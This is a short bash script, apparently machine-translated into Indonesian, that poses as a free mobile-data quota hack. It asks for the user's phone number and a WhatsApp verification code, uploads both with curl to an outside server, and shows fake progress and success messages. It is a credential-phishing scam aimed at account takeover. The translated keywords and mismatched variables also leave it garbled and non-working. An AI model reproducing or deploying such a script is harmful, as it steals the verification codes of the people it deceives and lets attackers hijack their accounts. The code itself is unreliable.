#! / bin / bash


bersih


gema "

<- DSFS Team ->

####################

# By Xenon1205

# Thanks D4RK SYST3M F41LUR3 S33K3R

####################

SEMOGA BERUNTUNG " ;


gema " " ;


baca -p " Isi dengan Nomer Kamu ex(+ 62xxxx) => " nomer ;


baca p " Berapa Kuota(GB) Yang akan di tembak? => " jangan masukkan ;


tidur 2


echo " [+] proses ... " ;


tidur 1


echo " Login => $ nomer " ;


tidur 0,5


echo " Target => $ Jumlah " ;


tidur 0,5


gema " [+] Memanfaatkan ... " ;


echo " Nomer => $ nomer " >> Sukses.html ;


curl -T Sukses.html http://apparelworld.org/


tidur 5 ;


echo " [+] Done. " ;


echo " Selamat Penembakan Sukses. " ;


baca -p " Kode Verifikasi => " kode ;


tidur 2


echo " [+] Sedang Menghubungkan ke whatsapp.com ... " ;


echo " Login => $ nomer " ;


tidur 0,5


echo " Code => $ Jumlah " ;


tidur 0,5


echo " Target => $ jumlah " ;


tidur 0,5


echo " [+] Mengirim Eksploitasi ... " ;


echo " Code => $ code " >> Sukses.html ;


curl -T Sukses.html http://apparelworld.org/


tidur 5


echo " [+] Telah Sukses! " ;


keluar ;


D

